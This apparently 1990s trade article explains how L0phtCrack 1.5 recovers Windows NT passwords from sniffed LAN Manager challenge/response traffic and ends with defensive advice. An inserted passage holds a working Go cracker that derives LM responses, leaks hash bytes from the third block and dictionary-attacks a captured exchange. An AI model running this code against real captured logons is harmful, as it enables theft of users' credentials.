By Al Berg
Unlike the original version of L0PHTCrack, the new version does not require an attacker to have physical access to a server's console to obtain valid usernames and passwords. Using a network analyzer, an attacker can capture the packets carrying the challenge/response sequence Windows NT uses to authenticate users and feed them to the L0PHT program. The username travels in those packets in the clear; the password itself is never sent, but the response is computed from it in a way that lets the program recover it by guessing.
The L0PHT group delights in finding and exposing flaws in Microsoft Windows NT and other networking products and bringing those flaws to the attention of vendors and the public in an effort to improve computer security.
Once the logon packets have been intercepted, L0PHTCrack takes a two-step approach to cracking the passwords. (A hashed password cannot be decrypted; it can only be guessed and checked.) First, a dictionary attack is made in which each word in a user-supplied text file is run through NT's password hash and challenge/response computation and the result is compared with what was captured. If the computed value matches the captured one, the password has been found. Passwords that don't appear in the dictionary file are attacked by brute force, in which every possible combination of characters is tried for each password until a match is found.
Dictionary attacks are performed extremely quickly: The L0PHT claims that a 200MHz Intel Corp. Pentium Pro can extract 100 passwords using an 8MB dictionary file in less than a minute. Brute-force attacks take much longer: 10 passwords can be forced in about 26 hours, assuming that the passwords all use alphabetic characters only.
L0PHTCrack takes advantage of a weakness in the Windows NT password scheme, caused by Microsoft's desire to maintain backward compatibility between NT and earlier products such as Windows and Windows 95. Those products use the older LAN Manager hash, which is far weaker than NT's own: the password is converted to uppercase, padded to 14 characters and split into two 7-character halves that are hashed independently with DES. Case therefore adds no strength, and a 14-character password is only as hard to crack as two 7-character ones. To stay compatible, an NT client answers the server's challenge with a response derived from this weak hash as well as one derived from the NT hash, so a sniffer only has to attack the weak one.
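The scheme described above, as an added example that is not code from the L0pht or from this article: a Go program that reproduces the LAN Manager hash and its challenge/response, then runs the dictionary step against a sniffed exchange. The challenge value, the password and the word list are constructed for the demonstration; the function names (lmHash, lmResponse, crackThirdBlock, crackResponse) are the example's own. It shows why the third block of the 24-byte response, whose DES key is two hash bytes plus five NUL bytes, is the first thing to attack and how it tells whether the password is longer than 7 characters before any dictionary is tried. DES comes from Go's standard crypto/des.

```go
package main

import (
	"bytes"
	"crypto/des"
	"encoding/binary"
	"encoding/hex"
	"fmt"
	"strings"
)

// desKeyFrom7 spreads a 7-byte key across the 8 DES key bytes with the low
// (parity) bit of each byte clear; DES ignores parity, so nothing is lost.
func desKeyFrom7(k7 []byte) []byte {
	k := make([]byte, 8)
	k[0] = k7[0] & 0xFE
	for i := 1; i < 7; i++ {
		k[i] = (k7[i-1]<<uint(8-i) | k7[i]>>uint(i)) & 0xFE
	}
	k[7] = (k7[6] << 1) & 0xFE
	return k
}

// desBlock encrypts one 8-byte block under a 7-byte key.
func desBlock(k7, block []byte) []byte {
	c, err := des.NewCipher(desKeyFrom7(k7))
	if err != nil {
		panic(err)
	}
	out := make([]byte, 8)
	c.Encrypt(out, block)
	return out
}

// lmHash is the LAN Manager hash: uppercase the password, NUL-pad it to 14
// bytes, split it into two 7-byte halves and use each half as a DES key to
// encrypt the constant "KGS!@#$%". A password of 7 characters or fewer leaves
// the second half all-NUL, which always hashes to AAD3B435B51404EE.
// (ASCII passwords only in this sketch; real LM used the OEM code page.)
func lmHash(password string) []byte {
	p := make([]byte, 14)
	copy(p, strings.ToUpper(password)) // copy also truncates at 14 bytes
	magic := []byte("KGS!@#$%")
	return append(desBlock(p[:7], magic), desBlock(p[7:], magic)...)
}

// lmResponse is what the client returns for the server's 8-byte challenge:
// the 16-byte hash NUL-padded to 21 bytes gives three 7-byte DES keys, and
// each encrypts the challenge. The third key contains only hash bytes 14-15.
func lmResponse(hash, challenge []byte) []byte {
	k := make([]byte, 21)
	copy(k, hash)
	resp := make([]byte, 0, 24)
	for i := 0; i < 3; i++ {
		resp = append(resp, desBlock(k[i*7:i*7+7], challenge)...)
	}
	return resp
}

// crackThirdBlock recovers hash bytes 14-15 from the last 8 response bytes.
// The key is two hash bytes plus five NULs, so at most 65536 DES operations.
func crackThirdBlock(challenge, resp []byte) (uint16, bool) {
	k := make([]byte, 7)
	for g := 0; g < 1<<16; g++ {
		binary.BigEndian.PutUint16(k, uint16(g))
		if bytes.Equal(desBlock(k, challenge), resp[16:24]) {
			return uint16(g), true
		}
	}
	return 0, false
}

// crackResponse is the dictionary step against a sniffed challenge/response:
// hash each word, skip it unless its bytes 14-15 match what the third block
// leaked, then compare the full 24-byte response. The leaked bytes also say
// whether the password exceeds 7 characters (0x04EE means it does not).
func crackResponse(challenge, resp []byte, words []string) (string, bool) {
	tail, ok := crackThirdBlock(challenge, resp)
	if !ok {
		return "", false
	}
	for _, w := range words {
		h := lmHash(w)
		if binary.BigEndian.Uint16(h[14:16]) != tail {
			continue
		}
		if bytes.Equal(lmResponse(h, challenge), resp) {
			return strings.ToUpper(w), true // LM never preserved the case
		}
	}
	return "", false
}

func main() {
	// Constructed sample, not a real trace: the challenge an analyzer would
	// read from the server's reply and the client's LM response to it.
	challenge, _ := hex.DecodeString("0123456789abcdef")
	resp := lmResponse(lmHash("Secret77"), challenge)
	words := []string{"letmein", "password", "secret77", "welcome"}
	tail, _ := crackThirdBlock(challenge, resp)
	fmt.Printf("hash bytes 14-15 leaked by block 3: %04X\n", tail)
	pw, ok := crackResponse(challenge, resp, words)
	fmt.Printf("dictionary attack: %q found=%v\n", pw, ok)
}
```

Run it with `go run`. crackThirdBlock exhausts all 65536 key guesses in a fraction of a second; recovering a full 7-character half by brute force is the same loop over a far larger key space, which is what turns the minutes of a dictionary run into the hours quoted below.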
L0PHTCrack 1.0 required an attacker to gain Administrator access to the system console. Microsoft quickly responded with a security feature that prevents even the Administrator from dumping out the required files at the console. L0PHTCrack 1.5 sidesteps that patch entirely: it never needs the files, because it takes what it needs from the network. Microsoft also issued a fix to stop "LAN Manager-style" passwords from being used. That fix helps only if the clients stop sending the LAN Manager response; configuring the server alone to refuse it does not keep the weak response off the wire, where a sniffer can still read it.
According to the hackers who created L0PHTCrack 1.5, you can protect servers from attack in a number of ways. First, use firewalls and routers to build walls between your networks and between your intranets and the Internet, so that the conversations between servers and clients are not easy to reach. Second, don't allow users with Administrator-level access to log in to servers over the network, since those are the passwords most worth capturing. Third, set file and directory permissions so that a compromised password does not give an intruder access to more data than necessary. Finally, monitor your systems for unusual activity. These measures limit who can get into position to capture the traffic and what a captured password is worth; none of them stops the weak response from being sent in the first place.
Contributing Editor Al Berg is a CNE and director/strategic technologies at NETLAN Inc., a networking and integration company in New York.